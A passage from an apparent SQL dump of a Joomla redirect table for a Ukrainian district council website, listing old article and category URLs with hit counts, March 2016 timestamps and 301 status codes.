00:00:00',301),(27614,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-27 17:55:25','0000-00-00 00:00:00',301),(27615,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&id=58:--30042014-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-03-27 18:03:12','0000-00-00 00:00:00',301),(27616,'http://www.malyn-rayrada.org.ua/index.php/662-ogoloshennja_10/','','','',1,0,'2016-03-27 18:50:25','0000-00-00 00:00:00',301),(27617,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=715:2012-06-14-15-17-44&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-27 19:13:33','0000-00-00 00:00:00',301),(27618,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-53-35/951-1','','','',2,0,'2016-03-27 19:15:49','0000-00-00 00:00:00',301),(27619,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=932:-l90-r&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-27 20:05:53','0000-00-00 00:00:00',301),(27620,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=824:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-27 20:45:53','0000-00-00 00:00:00',301),(27621,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=799:2012-10-18-13-37-03&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-27 22:23:59','0000-00-00 00:00:00',301),(27622,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2016-03-27 22:57:51','0000-00-00 00:00:00',301),(27623,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=621:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-27 23:35:40','0000-00-00 00:00:00',301),(27624,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=472:-l-r-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-28 00:17:21','0000-00-00 00:00:00',301),(27625,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?start=7','','','',1,0,'2016-03-28 00:21:22','0000-00-00 00:00:00',301),(27626,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=545:2012-01-26-12-06-01&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-28 01:04:44','0000-00-00 00:00:00',301),(27627,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=924:2013-02-20-19-06-08&lang=en&option=com_content&view=article','','','',1,0,'2016-03-28 01:19:35','0000-00-00 00:00:00',301),(27628,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=855:2012-12-12-14-22-20&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-28 01:20:34','0000-00-00 00:00:00',301),(27629,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=938:---------------6612-------626-&lang=uk&option=com_content&view=article','','','',4,0,'2016-03-28 03:51:01','0000-00-00 00:00:00',301),(27630,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/1210-mikola-trokhimovich-prokopenko-topo-j-gidronimika-sil-ta-mistsevostej-vorsivskoji-silskoji-radi','','','',7,0,'2016-03-28 03:57:21','0000-00-00 00:00:00',301),(27631,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02','','','',3,0,'2016-03-28 03:57:22','0000-00-00 00:00:00',301),(27632,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44','','','',4,0,'2016-03-28 03:57:34','0000-00-00 00:00:00',301),(27633,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/---1932-33-','','','',3,0,'2016-03-28 03:57:42','0000-00-00 00:00:00',301),(27634,'http://www.malyn-rayrada.org.ua/index.php?Itemid=11&catid=9&id=1:2010-06-05-13-18-17&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-28 04:15:12','0000-00-00 00:00:00',301),(27635,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=314:2011-05-20-13-01-00&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 04:34:45','0000-00-00 00:00:00',301),(27636,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1044:2013-07-05-11-26-05&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-28 06:44:11','0000-00-00 00:00:00',301),(27637,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02','','','',14,0,'2016-03-28 07:42:46','0000-00-00 00:00:00',301),(27638,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=786:-5-18112009-429-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 07:50:20','0000-00-00 00:00:00',301),(27639,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1102:2013-10-03-08-08-33&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-28 08:52:45','0000-00-00 00:00:00',301),(27640,'http://www.malyn-rayrada.org.ua/index.php?id=45&Itemid=84&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-03-28 08:59:49','0000-00-00 00:00:00',301),(27641,'http://www.malyn-rayrada.org.ua/index.php?id=46:--21122012&Itemid=85&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-03-28 09:00:01','0000-00-00 00:00:00',301),(27642,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=706:-qq-2012-2015-&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 09:00:50','0000-00-00 00:00:00',301),(27643,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=462:------2012-&catid=36&Itemid=70&lang=ru','','','',1,0,'2016-03-28 09:27:18','0000-00-00 00:00:00',301),(27644,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1207:-2007-2015-&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-28 10:08:43','0000-00-00 00:00:00',301),(27645,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1085:2013-09-11-12-15-54&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-28 10:22:26','0000-00-00 00:00:00',301),(27646,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/1-znajomtes-malinshhina?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-03-28 10:32:22','0000-00-00 00:00:00',301),(27647,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=825:-q-q&lang=en&option=com_content&view=article','','','',1,0,'2016-03-28 11:10:43','0000-00-00 00:00:00',301),(27648,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1196-do-dnya-pratsivnikiv-lisovogo-gospodarstva','','','',6,0,'2016-03-28 11:21:08','0000-00-00 00:00:00',301),(27649,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-28 12:14:12','0000-00-00 00:00:00',301),(27650,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=563:-30012012185-12&Itemid=76&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-28 13:56:15','0000-00-00 00:00:00',301),(27651,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=707:-231-280312-l-2012-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 14:16:51','0000-00-00 00:00:00',301),(27652,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1196-do-dnya-pratsivnikiv-lisovogo-gospodarstva?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-28 14:22:00','0000-00-00 00:00:00',301),(27653,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01?limitstart=0','','','',4,0,'2016-03-28 14:24:29','0000-00-00 00:00:00',301),(27654,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1198-chopovitska-selishchna-rada-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-03-28 14:25:54','0000-00-00 00:00:00',301),(27655,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/432-pro-zatverdzhennja-porjadku-i-normativiv_3?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-03-28 14:25:57','0000-00-00 00:00:00',301),(27656,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/45-analiz-reguljatornogo-vplivu','','','',5,0,'2016-03-28 14:26:00','0000-00-00 00:00:00',301),(27657,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=885:-2013-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 14:30:15','0000-00-00 00:00:00',301),(27658,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=651:-2012-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-28 14:31:01','0000-00-00 00:00:00',301),(27659,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1174:-2013-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-28 14:31:09','0000-00-00 00:00:00',301),(27660,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/624-istorija-uspihu-tov-junigran','','','',10,0,'2016-03-28 15:57:43','0000-00-00 00:00:00',301),(27661,'http://www.malyn-rayrada.org.ua/index.php?Itemid=33&catid=13:2010-06-06-03-57-58&id=13:2010-06-06-04-07-00&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-28 16:27:42','0000-00-00 00:00:00',301),(27662,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/655-videozvit-tvorchogo-zvitu-hudozhnih-kolektiviv?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-03-28 17:29:11','0000-00-00 00:00:00',301),(27663,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/715-mi-povinni-znati-vsju-pravdu','','','',2,0,'2016-03-28 17:29:12','0000-00-00 00:00:00',301),(27664,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/715-mi-povinni-znati-vsju-pravdu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-03-28 17:29:13','0000-00-00 00:00:00',301),(27665,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&id=47:-21022013-&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-28 18:01:21','0000-00-00 00:00:00',301),(27666,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=941:2013-02-27-14-30-15&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-28 18:11:54','0000-00-00 00:00:00',301),(27667,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01','','','',9,0,'2016-03-28 18:18:22','0000-00-00 00:00:00',301),(27668,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1071:2013-08-27-14-06-18&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 19:22:39','0000-00-00 00:00:00',301),(27669,'http://www.malyn-rayrada.org.ua/index.php?id=43&Itemid=82&lang=ru&layout=blog&limitstart=25&option=com_content&view=category','','','',1,0,'2016-03-28 20:14:10','0000-00-00 00:00:00',301),(27670,'http://www.malyn-rayrada.org.ua/index.php/513-za-materialami-zvernen-rajonnoi-radi_3/','','','',2,0,'2016-03-28 20:15:53','0000-00-00 00:00:00',301),(27671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=729:-l20-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-03-28 20:55:08','0000-00-00 00:00:00',301),(27672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-03-28 20:55:28','0000-00-00 00:00:00',301),(27673,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=880:2012-12-21-17-03-54&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 21:51:17','0000-00-00 00:00:00',301),(27674,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-53-35','','','',12,0,'2016-03-28 21:54:50','0000-00-00 00:00:00',301),(27675,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=863:------qq&lang=uk&option=com_content&view=article','','','',3,0,'2016-03-28 22:46:23','0000-00-00 00:00:00',301),(27676,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=627:2012-04-02-15-57-23&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-28 22:57:57','0000-00-00 00:00:00',301),(27677,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=870:2012-12-17-07-02-51&lang=en&option=com_content&view=article','','','',2,0,'2016-03-28 23:19:47','0000-00-00 00:00:00',301),(27678,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=721:-lr&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-28 23:37:11','0000-00-00 00:00:00',301),(27679,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&catid=5:2010-06-05-12-51-34&id=519:-2011-&lang=en&option=com_content&view=article','','','',2,0,'2016-03-29 00:03:35','0000-00-00 00:00:00',301),(27680,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=275:---------------2011-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-29 00:03:38','0000-00-00 00:00:00',301),(27681,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=929:2013-02-21-09-11-26&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-29 00:05:20','0000-00-00 00:00:00',301),(27682,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=588:2012-02-27-13-48-51&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-29 01:12:19','0000-00-00 00:00:00',301),(27683,'http://www.malyn-rayrada.org.ua/index.php?Itemid=11&catid=9&id=1:2010-06-05-13-18-17&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-29 01:35:55','0000-00-00 00:00:00',301),(27684,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=766:2012-09-28-08-37-31&lang=en&option=com_content&view=article','','','',1,0,'2016-03-29 02:01:49','0000-00-00 00:00:00',301),(27685,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/122-povidomlennja-pro-opriljudnennja-proektu','','','',6,0,'2016-03-29 02:33:09','0000-00-00 00:00:00',301),(27686,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&id=56&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-29 04:43:27','0000-00-00 00:00:00',301),(27687,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1021:-l-r&Itemid=92&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-29 05:23:46','0000-00-00 00:00:00',301),(27688,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=665:-75-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-29 05:42:11','0000-00-00 00:00:00',301),(27689,'http://www.malyn-rayrada.org.ua/index.php?id=618:2012-03-29-08-39-48&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-03-29 05:48:06','0000-00-00 00:00:00',301),(27690,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/432-pro-zatverdzhennja-porjadku-i-normativiv_3','','','',4,0,'2016-03-29 05:58:31','0000-00-00 00:00:00',301),(27691,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=821:------12--2012--311-l------------r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-29 06:16:36','0000-00-00 00:00:00',301),(27692,'http://www.malyn-rayrada.org.ua/index.php?catid=9&id=1:2010-06-05-13-18-17&Itemid=11&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-29 11:41:28','0000-00-00 00:00:00',301),(27693,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/---1932-33-','','','',7,0,'2016-03-29 13:10:34','0000-00-00 00:00:00',301),(27694,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-29 13:26:00','0000-00-00 00:00:00',301),(27695,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27:---1932-33-&Itemid=58&lang=en','','','',2,0,'2016-03-29 13:47:54','0000-00-00 00:00:00',301),(27696,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=8:2010-06-05-15-08-15&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-29 16:56:26','0000-00-00 00:00:00',301),(27697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=30:2010-06-07-12-16-56&catid=20&Itemid=42&lang=en','','','',1,0,'2016-03-29 17:33:05','0000-00-00 00:00:00',301),(27698,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/425-visti-iz-vladivki-za-materialami-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-03-29 17:34:23','0000-00-00 00:00:00',301),(27699,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/1-znajomtes-malinshhina?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-29 19:03:00','0000-00-00 00:00:00',301),(27700,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=665:-75-&lang=en&option=com_content&view=article','','','',1,0,'2016-03-29 19:40:17','0000-00-00 00:00:00',301),(27701,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1198-chopovitska-selishchna-rada-informue','','','',10,0,'2016-03-29 19:45:04','0000-00-00 00:00:00',301),(27702,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&id=37:--21102011-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-29 19:56:40','0000-00-00 00:00:00',301),(27703,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/30-iz-zhittja-rajonu','','','',1,0,'2016-03-29 20:04:53','0000-00-00 00:00:00',301),(27704,'http://www.malyn-rayrada.org.ua/index.php?Itemid=5&catid=2:2010-06-05-12-50-39&id=7:2010-06-05-14-44-23&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-29 20:46:43','0000-00-00 00:00:00',301),(27705,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=706:-qq-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-29 21:32:41','0000-00-00 00:00:00',301),(27706,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30:--30122010-&id=230:---3----6--30--2010-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-29 21:56:06','0000-00-00 00:00:00',301),(27707,'http://www.malyn-rayrada.org.ua/index.php?id=47&Itemid=86&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-29 22:40:42','0000-00-00 00:00:00',301),(27708,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01?start=5','','','',4,0,'2016-03-29 22:47:34','0000-00-00 00:00:00',301),(27709,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1196-do-dnya-pratsivnikiv-lisovogo-gospodarstva','','','',3,0,'2016-03-29 22:55:23','0000-00-00 00:00:00',301),(27710,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1207-do-dnya-pratsivnikiv-lisu','','','',2,0,'2016-03-29 22:55:26','0000-00-00 00:00:00',301),(27711,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1207-do-dnya-pratsivnikiv-lisu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-03-29 22:55:28','0000-00-00 00:00:00',301),(27712,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/655-videozvit-tvorchogo-zvitu-hudozhnih-kolektiviv','','','',3,0,'2016-03-29 22:55:30','0000-00-00 00:00:00',301),(27713,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=514:2011-12-22-10-03-07&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-29 23:09:23','0000-00-00 00:00:00',301),(27714,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=327:2011-05-20-16-20-26&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-29 23:13:56','0000-00-00 00:00:00',301),(27715,'http://www.malyn-rayrada.org.ua/index.php?Itemid=8&catid=4:2010-06-05-12-51-18&id=4:-1062010&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-29 23:32:54','0000-00-00 00:00:00',301),(27716,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/1210-mikola-trokhimovich-prokopenko-topo-j-gidronimika-sil-ta-mistsevostej-vorsivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-03-29 23:56:27','0000-00-00 00:00:00',301),(27717,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=676:2012-05-17-09-52-12&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 00:04:09','0000-00-00 00:00:00',301),(27718,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/423-visti-iz-fedorivki-za-materialami-trs-polissja','','','',1,0,'2016-03-30 00:09:07','0000-00-00 00:00:00',301),(27719,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=18:2010-06-06-10-06-41&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 01:07:43','0000-00-00 00:00:00',301),(27720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1:2010-06-05-13-18-17&catid=9:2010-06-05-12-55-45&Itemid=11&lang=ru','','','',1,0,'2016-03-30 01:18:05','0000-00-00 00:00:00',301),(27721,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/654-urochistosti-z-nagodi-zavershennja-remontu-shkoli','','','',3,0,'2016-03-30 01:18:13','0000-00-00 00:00:00',301),(27722,'http://www.malyn-rayrada.org.ua/attachments/424_reiting І кв.2013.pdf','','','',1,0,'2016-03-30 01:18:35','0000-00-00 00:00:00',301),(27723,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/655-videozvit-tvorchogo-zvitu-hudozhnih-kolektiviv','','','',3,0,'2016-03-30 01:18:36','0000-00-00 00:00:00',301),(27724,'http://www.malyn-rayrada.org.ua/index.php?catid=2010&id=1224:informue-tsvk-vibori-silskikh-ta-selishchnikh-goliv-rajonu','','','',5,0,'2016-03-30 01:49:59','0000-00-00 00:00:00',301),(27725,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=991:2013-04-22-08-24-54&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 01:57:39','0000-00-00 00:00:00',301),(27726,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=1173:2014-01-15-10-37-18','','','',1,0,'2016-03-30 02:11:30','0000-00-00 00:00:00',301),(27727,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=207:2010-12-15-14-22-39&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 02:13:06','0000-00-00 00:00:00',301),(27728,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=18:2010-06-06-10-06-41&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 02:13:07','0000-00-00 00:00:00',301),(27729,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31:-25032011&id=273:-2011-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 02:23:32','0000-00-00 00:00:00',301),(27730,'http://www.malyn-rayrada.org.ua/index.php?catid=2010&id=1223:tsvk-ofitsijni-dani','','','',1,0,'2016-03-30 02:27:28','0000-00-00 00:00:00',301),(27731,'http://www.malyn-rayrada.org.ua/index.php?Itemid=58&catid=27&id=142:2010-10-15-06-19-49&lang=en&option=com_content&view=article','','','',1,0,'2016-03-30 02:28:38','0000-00-00 00:00:00',301),(27732,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1287:2014-04-23-06-49-34&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 02:28:40','0000-00-00 00:00:00',301),(27733,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1268:-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 02:45:39','0000-00-00 00:00:00',301),(27734,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1196:2014-01-30-14-12-50&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 02:45:42','0000-00-00 00:00:00',301),(27735,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=687:2012-05-24-11-21-04&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 02:52:13','0000-00-00 00:00:00',301),(27736,'http://www.malyn-rayrada.org.ua/index.php?catid=41&id=663:-------20042012675-12&Itemid=78&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-30 02:52:57','0000-00-00 00:00:00',301),(27737,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=875:-2013-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-03-30 03:46:44','0000-00-00 00:00:00',301),(27738,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=421:2011-09-30-14-14-22&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 03:57:37','0000-00-00 00:00:00',301),(27739,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=940:2013-02-21-14-02-14&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 04:17:21','0000-00-00 00:00:00',301),(27740,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1049:2013-07-15-05-50-46&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 04:17:22','0000-00-00 00:00:00',301),(27741,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=729:-l20-r&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 04:26:01','0000-00-00 00:00:00',301),(27742,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=196:---------------------2005-2010-&Itemid=60&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 04:26:43','0000-00-00 00:00:00',301),(27743,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1090:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 05:02:06','0000-00-00 00:00:00',301),(27744,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=866:2012-12-14-06-58-01&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 05:36:01','0000-00-00 00:00:00',301),(27745,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=549:-2010-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 05:36:03','0000-00-00 00:00:00',301),(27746,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34:--15062011-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-30 05:42:22','0000-00-00 00:00:00',301),(27747,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=436:------l-r--2007-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 05:48:56','0000-00-00 00:00:00',301),(27748,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-30 05:49:43','0000-00-00 00:00:00',301),(27749,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=425:-2011-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 06:06:30','0000-00-00 00:00:00',301),(27750,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 06:06:30','0000-00-00 00:00:00',301),(27751,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=750:2012-09-01-09-40-02&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 06:06:31','0000-00-00 